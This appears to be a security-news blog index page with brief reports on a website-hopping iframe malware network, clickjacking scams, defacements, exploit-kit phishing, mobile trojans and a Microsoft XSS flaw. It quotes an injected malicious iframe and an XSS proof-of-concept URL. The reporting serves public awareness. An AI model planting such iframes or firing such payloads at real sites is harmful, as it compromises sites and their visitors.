Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Malware Report
Breaking News Malware Report

Distributed malware network comprised of thousands of websites

Thousands of websites are being hacked and added to the Distributed malware network , warns Researchers at Sucuri Labs. The sites are being injected with the following iframe:

<iframe src="http://hackedsite.com/stats.php" name="Twitter" ..

"Once inserted, these iFrames can be controlled to distribute the malware of course, but they can also be used to add things like drive-by downloads, and other types of browser-based attacks. Although the exact vector is unknown, the malware has been found across sites with know outdated software, and in some cases known vulnerable versions." The Sucuri blog post reads.

How does a distributed web-based malware network function?
Site-X.com is hacked and a malicious file named stats.php is inserted into it. An iFrame is then added to source code from Site-Y.com/stats.php. Site-Y.com is also compromised, it has a stats.php file added to it, and an iFrame from Site-Z.com/stats.php added. 

"When all is said and done, you have a large network of compromised sites, all linking to each other and all with the same malware."
Read more »
Spam Report
Clickjacking Spam Report

Facebook Scam :At 17, she did THIS in public high school, EVERY day! Outrageous?


There is a video floating around facebook with a headlines that reads "[SHOCK] At 17, she did THIS in public high school, EVERY day! Outrageous?". Clicking the link leads you to the blogspot which pretends it is about to show you a video.

After analyzing the webpage, i found that the scam targets only users from Australia, U.S, Canada, South Africa,France, Ireland and UK. When a user from other countries try to visit the link, they will be redirected to google.com.

script used identify the country


The page pretends it is about to show you a video.However, the "play" button on the video hides a secret "Like" button, which means that you share the link even further across your social network by clickjacking - helping the scammers spread their link virally.

Facebook like script


There are numerous sites that mirror this. You should always be careful about what you click on on Facebook .

Few Attackers site
Read more »
Defaced Website
Anonymous Hackers Defaced Website

Presidency of Paraguay website hacked by Anonymous


The official website of the Presidency of Paraguay (presidencia.gov.py) has been hacked by Paraguay Unlocker Security, a group of Anonymous-affiliated hackers.

The site’s main page has been defaced to host a couple of images and a message to the government.

“[Expletive] this [expletive]. Government stop robbing people and build a better country,” reads a translation of the hackers' statement.

The website’s main page isn’t the only one affected by the breach. The hacktivists have also posted short messages and images on the photo album, videos, news, agenda, and presidency TV web pages.

The Facebook page and the Twitter account of the “Presidencia Paraguay” don’t seem to be impacted.

At the time of writing , the site still displayed all the messages and pictures published by Anonymous.
Read more »
Spam Report
Spam Report

American Express 'forgotten user ID' spam mail leads to BlackHole Exploit Kit

NSS Labs has spotted a phishing campaign targeting American Express customers. The phishing emails ask users if they have recently reset their password, or verified their user ID for their American Express Card account online.

“Did you recently verify your User ID or reset the password that you use to manage your American Express Card account online?” reads the malicious notification.

Unlike the normal phishing mails, the link in the mail leads to website that hosts a variant of the Blackhole exploit kit.

BlackHole Exploit kit exploits the known vulnerabilities in Java , Adobe reader and others. After successfully exploiting the vulnerability, The site installs Trojan downloader in the victim system.

Once the Trojan download has been installed, anything from fake security products to keystroke loggers to eavesdropping software can follow.
Read more »
Malware Report
iPhone Malware Malware Report

Find & Call : malicious iPhone App Found in Apple's iTunes Store


The recent report from Kaspersky on malicious iPhone app spreads like a wildfire on the Internet. Security experts were debating after Kaspersky Lab's Denis Maslennikov said that a Trojan horse - malicious software that pretends to be something innocuous - had gotten past Apple's famously tough App Store vetting process, which has never before let in real malware.

"The application is called 'Find and Call' and can be found in both the iOS Apple App Store and Android’s Google Play," Maslennikov wrote in a blog posting.

Find and Call, made by a Russian firm, claims to be an app that lets you make phone calls by simply typing in or clicking a contact's email address or social-network handle — admittedly a useful idea.

"In order to call somebody from your mobile phone, you can use an email address, a domain name, a profile address in a social network, etc., instead of a phone number just as easily," states the Find and Call official website.

But Maslennikov said Find and Call also copies a user's entire address book to its own servers, and sends out spam text messages to everyone in the address book imploring them to also install the app.

Screenshots of complaints by angry Russian users in the iOS App Store and Google Play, and Maslennikov's own screenshots of code within the app, support his assertion.

Nowhere in Find and Call's terms of use does it say that the app will copy your address book or send out text messages to your friends, Maslennikov said.

An email from Find and Call support staff to the Russian site AppleInsider.ru stated that the sending of "inviting SMS messages" was a "bug in process of fixing."

Sophos Labs' Vanja Svajcer had doubts about whether this behavior really was malicious, or just annoying.

"I'm not sure I 100 percent agree with Kaspersky that it is malware," Svajcer wrote on Sophos' Naked Security blog. "It would probably be more accurate to say that the 'Find and Call' app is 'spammy.'"

Both Google and Apple have removed the app from their websites.

According to softpedia report, Find and Call's creators have contacted AppInsider.ru and told them that the app is still in "beta-testing." The fact that SMSs are sent out to all the contacts is allegedly just a bug.
Read more »
Malware Report
Android Malwares Malware Report

Boxer SMS Trojan poses as Firefox for Android

Recently, Mozilla has launched Firefox 14 for devices that run an Android OS. Cyber-criminals turned the event to their advantage and started masquerading an SMS Trojan as the Firefox.

Security Researchers at GFI Lab ,spotted an Android application posing as the popular Web browser Firefox and is hosted on several Russian websites. The Android application files (.APK) users can download from them not only vary in file names but also in file sizes.

GFI VIPRE Mobile Security detects the malicious apps as Trojan.AndroidOS.Boxer.d.

The typical Boxer malware appears to be a legitimate app that users can download. Once installed, it loads a Rules page on the phone and asks users to accept it. The app then sends a premium SMS message to any of these numbers: 2855, 3855, 7151, or 8151. The Rules page discloses (in small text) that users will be billed for sending a premium SMS message. Boxer then directs users to the actual website where the legitimate app can be downloaded after claiming that it has successfully activated.

However, this particular variant doesn’t give any details regarding its true purpose. This variant sends the premium SMS message, “5975+3480758+x+a”, to the aforementioned numbers. Lastly, it loads google.com instead of directing users to the actual download site.

Researchers believe that this may be a tactic to make users think that the application is defective. They might download and install the fake software again, allowing Boxer to perform its malicious tasks more than once.

Read more »
Hackers Arrested
Cyber Crime Hackers Arrested

TriCk - The leader of the hacker group "TeaMp0isoN" pleads guilty

The leader of the hacker group "TeaMp0isoN" has pleaded guilty to stealing the address book details and other private data from former British Prime Minister Tony Blair in June of last year.

Junaid Hussain, also known as "TriCk", has now admitted to hacking into a Gmail email account belonging an advisor to Blair by the name of Katy Kay.

Hussain, 18, from Birmingham, said that he used an ID "Trick" to access the aide's account and steal confidential data including addresses, phone numbers and email addresses belonging to Blair, his wife, and sister-in-law Lyndsye Booth, as well as Members of Parliament (MPs) and Members of the House of Lords.

Ben Cooper, Hussain's lawyer, told the court that the offences had just been a prank.

After admitting to conspiracy and computer charges at London's Southwark Crown Court, Judge Peter Testar granted Hussain bail until sentencing later this month, advising him to be "under no illusions" that he may go to prison.

Hussain has also confessed to taking part in and leading members of the hacker group to attack the UK national Anti-Terrorist Hotline with hundreds of hoax phone calls.
Read more »
Malware Report
Banking Trojans Citadel Malware Report

Citadel Trojan is going off the Open Market

A spokesperson for the minds behind the Citadel Trojan said recently on an underground forum that the malware would no longer be publicly available, according to RSA.

According to RSA’s FraudAction Research Labs, a spokesperson for the creators of the Citadel Trojan declared on an underground forum after the recent release of the Trojan’s latest version (v1.3.4.5) that the software would no longer be publicly available and only existing customers would be able to receive upgrades.

Others who wish to purchase a new kit would have to get an existing customer to vouch for them. It remains to be seen if the developers will actually pull it off digital shelves, a spokesperson for EMC’s RSA security division told eWEEK July 2.

"While this could be a marketing stunt designed to create urgency and generate more sales, Citadel’s developers could also be seeing the need to slow down sales," RSA blog post reads.

“By selling less, they can keep the Trojan from being all too widely spread, which will invariably lead to more sampling and research and cause them the need to rework its evasion mechanisms. Additionally, more customers also means more support, more underground buzz, and eventually—as with Zeus, SpyEye, and Carberp—more cyber-crime arrests linked with using Citadel.”

Citadel is built on the source code of the notorious Zeus Trojan typically linked to the theft of banking credentials and fraud. In May, the Internet Crime Complaint Center (IC3), a multi-agency task force consisting of the FBI, the National White Collar Crime Center (NW3C) and the Bureau of Justice Assistance, warned that the Citadel platform was being used to deliver ransomware known as Reveton.

Today, Citadel is the most advanced crimeware tool money can buy, RSA said. Sold for $2,500, attackers can also purchase plug-ins for an average of $1,000 each.

"Malware developers working on criminal-popular projects like Citadel rightfully fear law enforcement. Their actions of developing, supporting and selling advanced crimeware makes them an accessory to the crimes which can easily get them indicted alongside their botmaster customers. The more popular the banking Trojan becomes, the more banks and merchants push to have its developers and bot masters behind bars."

"Looking to the surrounding cybercrime arena, history proves that malware coders know when to leave the room. To date, developers of popular Trojans like Zeus’ Slavik, SpyEye’s Gribodemon, and Ice IX’s GSS have never been arrested and we are seeing the Citadel’s team already taking measures to go deeper underground for their own safety."
Read more »
XSS Vulnerability
Vulnerability Web Application Vulnerability XSS Vulnerability

XSS vulnerability found in Microsoft.com

A security Researcher , Gambit, has discovered Cross site scripting vulnerability in Microsoft official website.

He found the vulnerability last month and reported the vulnerabilities to the Microsoft.

"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain.  I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page."Gambit said in his blog.


Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.

'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS.  Researcher managed to execute the XSS code in the page.


POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"
Read more »
Defaced Website
Anonymous Hackers Breaking News Defaced Website

#OpLiberation : Oak Creek Ranch School hacked by Anonymous


An Anonymous-affiliated hacker that goes by the name of Antidote (AnonAntidote) has taken credit for defacing the website of the Oak Creek Ranch School (ocrs.com), Arizona.

The breach is part of Operation Liberation, a campaign that aims to protest abuses that take place against teenagers in certain educational institutions.


“You make your money off the naive, the lazy and the misguided parents leading them to believe that you are helping their sons and daughters to be healed, educated and treated,” Antidote said.

“Putting in place point systems to buy necessities as well as privileges and providing punishment and abuse to those who wander stray of them. In reality this doesn’t treat or help them but instead lowers self-esteem. Simply expelling students that you can’t control while keeping the hard earned money given by the parents.”


The hacker also leaked the school’s mailing list, made of over 300 records, which may indicate that he had gained access to the organization’s databases.

Operation Liberation was launched back in August 2011 and has made a lot of victims since.

“For years, teenagers have had to suffer from countless years of torture and brainwashing in so called ‘troubled teen camps.’ These include camps like Cross Creek in Utah, and Paradise Cove in Samoa,” hacktivists said at the time.

“We will not stand for the abuse against these children, we will make sure all of the schools, and the sponsors who started these schools, the WWASP, will suffer consequences for their actions against the civil rights of the youth.”
Read more »
Vulnerability
BlackHole Exploit Vulnerability

0-day XML core services vulnerability(CVE-2012-1889) included in Blackhole exploit kit

A few weeks ago, we have published news related to vulnerability in Microsoft XML core services(CVE-2012-1889). The vulnerability is a true zero-day, being exploited in the wild, with no patch yet available from Microsoft.

Sophos researchers discovered that the exploit for this vulnerability has been added to the Blackhole exploit kit.


A new function has been added to the Blackhole exploit that targets CVE-2012-1889. The function used well-described heapspray techniques to deliver the shellcode, prior to exploiting the vulnerability in order that execution passes to that shellcode.

The shellcode is pretty straightforward, attempting to download the payload (a dll) from a remote server, writing it to the temp folder.
Read more »
Subscribe to: Comments (Atom)